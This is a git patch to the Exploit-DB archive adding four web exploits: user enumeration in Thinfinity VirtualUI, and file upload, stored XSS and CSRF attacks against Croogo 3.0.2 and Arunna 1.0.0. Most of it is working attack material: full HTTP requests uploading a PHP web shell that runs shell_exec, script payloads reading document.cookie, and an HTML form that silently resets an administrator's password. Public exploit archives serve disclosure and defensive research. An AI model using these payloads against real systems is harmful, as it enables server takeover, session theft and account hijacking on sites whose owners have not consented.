From 929e2549452fb71fcd442b0964dd7221c31177d1 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 17 Dec 2021 05:01:54 +0000
Subject: [PATCH] DB: 2021-12-17

4 changes to exploits/shellcodes

Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration
Croogo 3.0.2 - Unrestricted File Upload
Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)
Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
---
 exploits/multiple/webapps/50601.txt |  12 +++
 exploits/php/webapps/50602.txt      |  61 ++++++++++++++
 exploits/php/webapps/50603.txt      | 124 ++++++++++++++++++++++++++++
 exploits/php/webapps/50608.html     |  35 ++++++++
 files_exploits.csv                  |   4 +
 5 files changed, 236 insertions(+)
 create mode 100644 exploits/multiple/webapps/50601.txt
 create mode 100644 exploits/php/webapps/50602.txt
 create mode 100644 exploits/php/webapps/50603.txt
 create mode 100644 exploits/php/webapps/50608.html

diff --git a/exploits/multiple/webapps/50601.txt b/exploits/multiple/webapps/50601.txt
new file mode 100644
index 000000000..f06810fdb
--- /dev/null
+++ b/exploits/multiple/webapps/50601.txt
@@ -0,0 +1,12 @@
+# Exploit Title: Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration
+# Date: 13/12/2021
+# Exploit Author: Daniel Morales, IT Security Team - ARHS Spikeseed
+# Vendor Homepage: https://www.cybelesoft.com
+# Software Link: https://www.cybelesoft.com/thinfinity/virtualui/
+# Version: vulnerable < v3.0
+# Tested on: Microsoft Windows
+# CVE: CVE-2021-44848
+
+How it works: By accessing the vector, an attacker can determine if a username exists thanks to the message returned; it can be presented in different languages according to the configuration of VirtualUI. Common users are administrator, admin, guest...
+Payload: The vulnerable vector is "https://example.com/changePassword?username=USERNAME" where "USERNAME" need to be brute-forced.
+Reference: https://github.com/cybelesoft/virtualui/issues/1
\ No newline at end of file
diff --git a/exploits/php/webapps/50602.txt b/exploits/php/webapps/50602.txt
new file mode 100644
index 000000000..b2773e098
--- /dev/null
+++ b/exploits/php/webapps/50602.txt
@@ -0,0 +1,61 @@
+# Exploit Title: Croogo 3.0.2 - Unrestricted File Upload
+# Date: 06/12/2021
+# Exploit Author: Enes Özeser
+# Vendor Homepage: https://croogo.org/
+# Software Link: https://downloads.croogo.org/v3.0.2.zip
+# Version: 3.0.2
+# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3
+
+==> 'setting-43' Unrestricted File Upload <==
+
+1- Login with your privileged account.
+2- Click on the 'Settings' section.
+3- Go to the 'Themes'. Directory is '/admin/settings/settings/prefix/Theme'
+4- Choose a malicious php script and upload it.
+5- Go to the '/uploads/(NAME).php' directory. You must change 'NAME' parameter with your filename you uploaded.
+6- The malicious PHP script will be executed.
+
+POST /admin/settings/settings/prefix/Theme HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------360738881613175158033315978127
+Content-Length: 970
+Origin: http://(HOST)
+Connection: close
+Referer: http://(HOST)/admin/settings/settings/prefix/Theme
+Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+-----------------------------360738881613175158033315978127
+Content-Disposition: form-data; name="_method"
+
+POST
+-----------------------------360738881613175158033315978127
+Content-Disposition: form-data; name="_csrfToken"
+
+c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a
+-----------------------------360738881613175158033315978127
+Content-Disposition: form-data; name="setting-43"; filename="malicious.php"
+Content-Type: application/octet-stream
+
+<?php
+$command = shell_exec('netstat -an');
+echo "<pre>$command</pre>";
+?>
+
+-----------------------------360738881613175158033315978127
+Content-Disposition: form-data; name="_Token[fields]"
+
+c4e0a45b25b5eaf8fa6e0e4ddcd3be00c621b803%3A
+-----------------------------360738881613175158033315978127
+Content-Disposition: form-data; name="_Token[unlocked]"
+
+
+-----------------------------360738881613175158033315978127--
\ No newline at end of file
diff --git a/exploits/php/webapps/50603.txt b/exploits/php/webapps/50603.txt
new file mode 100644
index 000000000..b60d7f034
--- /dev/null
+++ b/exploits/php/webapps/50603.txt
@@ -0,0 +1,124 @@
+# Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)
+# Date: 06/12/2021
+# Exploit Author: Enes Özeser
+# Vendor Homepage: https://croogo.org/
+# Software Link: https://downloads.croogo.org/v3.0.2.zip
+# Version: 3.0.2
+# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3
+
+==> 'Content-Type' Stored Cross-Site Scripting (/admin/file-manager/attachments/add) <==
+
+POST /admin/file-manager/attachments/add HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------114221148012003093972656004730
+Content-Length: 923
+Origin: http://(HOST)
+Connection: close
+Referer: http://(HOST)/admin/file-manager/attachments/add
+Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+-----------------------------114221148012003093972656004730
+Content-Disposition: form-data; name="_method"
+
+POST
+-----------------------------114221148012003093972656004730
+Content-Disposition: form-data; name="_csrfToken"
+
+c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a
+-----------------------------114221148012003093972656004730
+Content-Disposition: form-data; name="file"; filename="file.txt"
+Content-Type: <script>alert(document.cookie)</script>
+
+Enes Ozeser (@enesozeser)
+-----------------------------114221148012003093972656004730
+Content-Disposition: form-data; name="_Token[fields]"
+
+16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A
+-----------------------------114221148012003093972656004730
+Content-Disposition: form-data; name="_Token[unlocked]"
+
+
+-----------------------------114221148012003093972656004730--
+
+
+==> 'title' Stored Cross-Site Scripting (/admin/taxonomy/types/edit/) <==
+
+POST /admin/taxonomy/types/edit/5 HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 590
+Origin: http://(HOST)
+Connection: close
+Referer: http://(HOST)admin/taxonomy/types/edit/5
+Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
+title=<script>alert(document.cookie)</script>&alias=Alias&description=Description&vocabularies[_ids]=&comment_status=&comment_status=2&comment_approve=0&
+comment_approve=1&comment_spam_protection=0&comment_captcha=0&params=routes=true&format_show_author=0&format_show_author=1&format_show_date=0&format_show_date=1&
+format_use_wysiwyg=0&format_use_wysiwyg=1&_Token[fields]=ee5145e2485f47bddda98c72f96db218bffdd827%3A&_Token[unlocked]=_apply
+
+
+==> 'title' Stored Cross-Site Scripting (/admin/blocks/regions/edit/) <==
+
+POST /admin/blocks/regions/edit/3 HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 336
+Origin: http://(HOST)
+Connection: close
+Referer: http://(HOST)/admin/blocks/regions/edit/3
+Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
+title=<script>alert(document.cookie)</script>&alias=Alias&_Token[fields]=49781a41a2787c301464989f09805bc79fa26c13%3A&_Token[unlocked]=_apply
+
+
+==> 'title' Stored Cross-Site Scripting (/admin/file-manager/attachments/edit/) <==
+
+POST /admin/file-manager/attachments/edit/20 HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 363
+Origin: http://(HOST)
+Connection: close
+Referer: http://(HOST)/admin/file-manager/attachments/edit/20
+Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
+title=<script>alert(document.cookie)</script>&excerpt=&file_url=http://(HOST)/uploads/file.txt&file_type=text/plain&_Token[fields]=6170a60e541f596fe579a5e70fea879aafb9ac14%3A&_Token[unlocked]=_apply
\ No newline at end of file
diff --git a/exploits/php/webapps/50608.html b/exploits/php/webapps/50608.html
new file mode 100644
index 000000000..2b309cd1a
--- /dev/null
+++ b/exploits/php/webapps/50608.html
@@ -0,0 +1,35 @@
+# Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
+# Date: November 29, 2021
+# Exploit Author: =(L_L)=
+# Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/
+# Vendor Homepage: https://github.com/arunna
+# Software Link: https://github.com/arunna/arunna
+# Version: 1.0.0
+# Tested on: Ubuntu 20.04.2 LTS
+
+<!--
+The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on).
+-->
+
+<html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr>
+<tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr>
+<tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr>
+<tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr>
+<tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr>
+<tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr>
+<tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr>
+<tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr>
+<tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr>
+<tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr>
+<tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr>
+<tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr>
+<tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr>
+<tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr>
+<tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr>
+<tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr>
+<tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr>
+<tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr>
+<tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr>
+<tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr>
+<tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr>
+</table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 0e6463d7d..6637ea361 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44684,3 +44684,7 @@ id,file,description,date,author,type,platform,port
 50595,exploits/hardware/webapps/50595.txt,"Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware,
 50596,exploits/php/webapps/50596.txt,"meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,LiquidWorm,webapps,php,
 50597,exploits/php/webapps/50597.txt,"Online Thesis Archiving System 1.0 - SQLi Authentication Bypass",1970-01-01,"Yehia Elghaly",webapps,php,
+50601,exploits/multiple/webapps/50601.txt,"Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration",1970-01-01,"Daniel Morales",webapps,multiple,
+50602,exploits/php/webapps/50602.txt,"Croogo 3.0.2 - Unrestricted File Upload",1970-01-01,"Enes Özeser",webapps,php,
+50603,exploits/php/webapps/50603.txt,"Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Enes Özeser",webapps,php,
+50608,exploits/php/webapps/50608.html,"Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,=(L_L)=,webapps,php,